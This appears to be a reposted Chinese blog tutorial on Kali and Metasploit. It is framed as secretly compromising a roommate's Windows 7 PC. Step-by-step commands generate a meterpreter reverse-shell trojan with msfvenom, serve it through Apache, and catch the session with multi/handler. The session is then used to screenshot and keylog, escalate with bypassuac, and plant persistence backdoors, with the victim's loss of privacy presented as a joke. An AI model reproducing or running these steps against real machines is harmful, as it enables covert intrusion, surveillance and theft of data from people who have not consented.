kali渗透-基础篇
滲透之meterpreter
模擬場景:小明是我室友,整天游戲人生,渾渾噩噩,前途迷茫,每次上課交作業都要看我的,于是我開啟了apche服務器,給他下載作業(別問我為什么不用QQ傳,因為要裝逼!),他無意中看到我的一些其他軟件,并也一起打包下載了,并且運行了一個*.exe程序,嘿嘿,從此他的電腦上便再無秘密可言。
?
0x1.實驗環境
VMware
kali(linux)系統 kali ip:192.168.127.128
windows 7專業版
kali鏡像官方下載地址->>https://www.kali.org/downloads/
0x2.開始實驗
0x2.1.終端進入msfconsole控制臺
輸入->>msfconsole? ? ? 回車即可
生成木馬程序
輸入->>msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.127.128 LPORT=4444 -f exe > 1.exe
提示:命令中的ip地址為kali IP地址,端口號可自行設定(盡量設置為不常用端口號),1.exe為木馬程序,名字隨意,由.exe結尾即可。
開啟一個新終端
開啟apache服務,將默認主頁刪除并復制1.exe文件到該目錄下
輸入->>service apache2 start
->>rm /var/www/html/*
->>cp 1.exe /var/www/html/
win7在同一局域網內主機就可以訪問到:http://192.168.127.128:80
win7點擊1.exe文件即可下載,現在我們將該文件下載下來放到桌面上運行。
回到kali的msf上,使用監聽模塊,設置一些參數,輸入options即可查看需要設置的參數。
輸入->>use exploit/multi/handler
->>set payload windows/meterpreter/reverse_tcp
->>set LHost 192.168.127.128
->>set LPORT 4444
提示:IP為kali IP地址,端口為之前生成1.exe時端口,默認端口為4444
執行exploit即可連上win7了
查看當前權限
輸入命令->>getuid
顯示系統權限,那就可以做很多事情了。
可能做到這里就只有用戶權限了,那也是沒關系的!
可以先試試獲取遠端桌面截屏,記錄鍵盤等
截屏操作
輸入->>screenshot
還有就是鍵盤記錄,你輸了什么我都知道,哈哈哈。
如果不是system權限或administrator權限就需要提權。
shell命令打開win7終端
提權
說明:本來我第一次做的時候拿到的也是用戶權限,找了一些資料,試了幾種方法均未成功,后來看到一篇win7提權的,終于成功了!
以exploit/windows/local/bypassuac模塊為例
該模塊在windows 32位和64位下都有效。
msf > use exploit/windows/local/bypassuac->> set session 2->> exploit用sessions命令就可以看到自己的編號了,我這里是2
植入后門
提升權限完第一件事就是留后門了。
現在只不過是放了一個馬而已,下次啟動就不運行了,這怎么行!所以我們得留個后門啊!
輸入->>run persistence -X -i 5 -p 4444 -r 192.168.127.128
-X為開機自啟 -i為反向連接
metsvc攻擊
開啟一個會話服務
輸入->>run metsvc
win7上已經有了。
?
參考來自-》》https://xz.aliyun.com/t/2536#toc-2
-》》https://paper.seebug.org/29/
提權文章使用的是->>https://www.cnblogs.com/wh4am1/p/6602650.html方法,可以嘗試其他方法進行提權哦!
轉載于:https://www.cnblogs.com/gh747/p/10653596.html
總結
以上是生活随笔為你收集整理的kali渗透-基础篇的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 一个小程序的首页对接后端实现用户注册
- 下一篇: [19/04/04-星期四] IO技术_